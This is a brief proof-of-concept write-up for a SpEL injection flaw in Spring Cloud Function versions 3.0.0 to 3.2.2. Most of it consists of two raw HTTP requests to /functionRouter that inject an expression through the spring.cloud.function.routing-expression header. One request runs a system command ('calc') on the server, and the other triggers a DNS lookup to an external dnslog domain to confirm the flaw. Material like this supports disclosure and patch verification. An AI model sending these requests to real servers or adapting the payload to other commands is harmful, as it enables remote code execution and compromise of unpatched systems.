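Introduction

Spring Cloud Function is a function-computing framework built on Spring Boot. It abstracts away all transport details and infrastructure, letting developers keep their familiar tools and processes and focus on business logic.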

Affected versions

3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

Reproduction

POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("calc")
Content-Length: 5

123


POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression: T(java.net.InetAddress).getByName("81731h.dnslog.cn")
Content-Length: 3

123


References

https://github.com/hktalent/spring-spel-0day-poc